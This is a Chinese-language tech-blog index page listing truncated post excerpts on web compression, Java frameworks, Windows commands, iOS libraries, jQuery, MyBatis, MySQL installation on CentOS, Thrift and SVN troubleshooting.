    背景: HTTP 压缩可以大大提高浏览网站的速度,它的原理是,在客户端请求网页后,从服务器端将网页文件压缩,再下载到客户端,由客户端的浏览器负责解压缩并浏览。相对于普通的浏览过程HTML ,CSS,Javascript , Text ,它可以节省40%左右的流量。更为重要的是,它可以对动态生成的,包括CGI、PHP , JSP , ASP , Servlet,SHTML等输出的网页也能进行压缩,
  • SpringMVC and Struts2 dashuaifu struts2springMVC
    SpringMVC VS Struts2 1: spring3开发效率高于struts 2: spring3 mvc可以认为已经100%零配置 3: struts2是类级别的拦截, 一个类对应一个request上下文, springmvc是方法级别的拦截,一个方法对应一个request上下文,而方法同时又跟一个url对应 所以说从架构本身上 spring3 mvc就容易实现r
  • windows常用命令行命令 dcj3sjt126com windowscmdcommand
    在windows系统中,点击开始-运行,可以直接输入命令行,快速打开一些原本需要多次点击图标才能打开的界面,如常用的输入cmd打开dos命令行,输入taskmgr打开任务管理器。此处列出了网上搜集到的一些常用命令。winver 检查windows版本 wmimgmt.msc 打开windows管理体系结构(wmi) wupdmgr windows更新程序 wscrip
  • 再看知名应用背后的第三方开源项目 dcj3sjt126com ios
    知名应用程序的设计和技术一直都是开发者需要学习的,同样这些应用所使用的开源框架也是不可忽视的一部分。此前《 iOS第三方开源库的吐槽和备忘》中作者ibireme列举了国内多款知名应用所使用的开源框架,并对其中一些框架进行了分析,同样国外开发者 @iOSCowboy也在博客中给我们列出了国外多款知名应用使用的开源框架。另外txx's blog中详细介绍了 Facebook Paper使用的第三
  • Objective-c单例模式的正确写法 jsntghf 单例iosiPhone
    一般情况下,可能我们写的单例模式是这样的: #import <Foundation/Foundation.h> @interface Downloader : NSObject + (instancetype)sharedDownloader; @end #import "Downloader.h" @implementation
  • jquery easyui datagrid 加载成功,选中某一行 hae jqueryeasyuidatagrid数据加载
    1.首先你需要设置datagrid的onLoadSuccess $( '#dg' ).datagrid({onLoadSuccess :  function (data){      $( '#dg' ).datagrid( 'selectRow' ,3); }});   2.onL
  • jQuery用户数字打分评价效果 ini JavaScripthtmljqueryWebcss
    效果体验:http://hovertree.com/texiao/jquery/5.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery用户数字打分评分代码 - HoverTree</
  • mybatis的paramType kerryg DAOsql
    MyBatis传多个参数: 1、采用#{0},#{1}获得参数:    Dao层函数方法:     public User selectUser(String name,String area); 对应的Mapper.xml    <select id="selectUser" result
  • centos 7安装mysql5.5 MrLee23 centos
    首先centos7 已经不支持mysql,因为收费了你懂得,所以内部集成了mariadb,而安装mysql的话会和mariadb的文件冲突,所以需要先卸载掉mariadb,以下为卸载mariadb,安装mysql的步骤。   #列出所有被安装的rpm package rpm -qa | grep mariadb   #卸载 rpm -e mariadb-libs-5.
  • 利用thrift来实现消息群发 qifeifei thrift
               Thrift项目一般用来做内部项目接偶用的,还有能跨不同语言的功能,非常方便,一般前端系统和后台server线上都是3个节点,然后前端通过获取client来访问后台server,那么如果是多太server,就是有一个负载均衡的方法,然后最后访问其中一个节点。那么换个思路,能不能发送给所有节点的server呢,如果能就
  • 实现一个sizeof获取Java对象大小 teasp javaHotSpot内存对象大小sizeof
       由于Java的设计者不想让程序员管理和了解内存的使用,我们想要知道一个对象在内存中的大小变得比较困难了。本文提供了可以获取对象的大小的方法,但是由于各个虚拟机在内存使用上可能存在不同,因此该方法不能在各虚拟机上都适用,而是仅在hotspot 32位虚拟机上,或者其它内存管理方式与hotspot 32位虚拟机相同的虚拟机上 适用。     
  • SVN错误及处理 xiangqian0505 SVN提交文件时服务器强行关闭
    在SVN服务控制台打开资源库“SVN无法读取current” ---摘自网络 写道 SVN无法读取current修复方法 Can't read file : End of file found 文件:repository/db/txn_current、repository/db/current   其中current记录当前最新版本号,txn_current记录版本库中版本
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他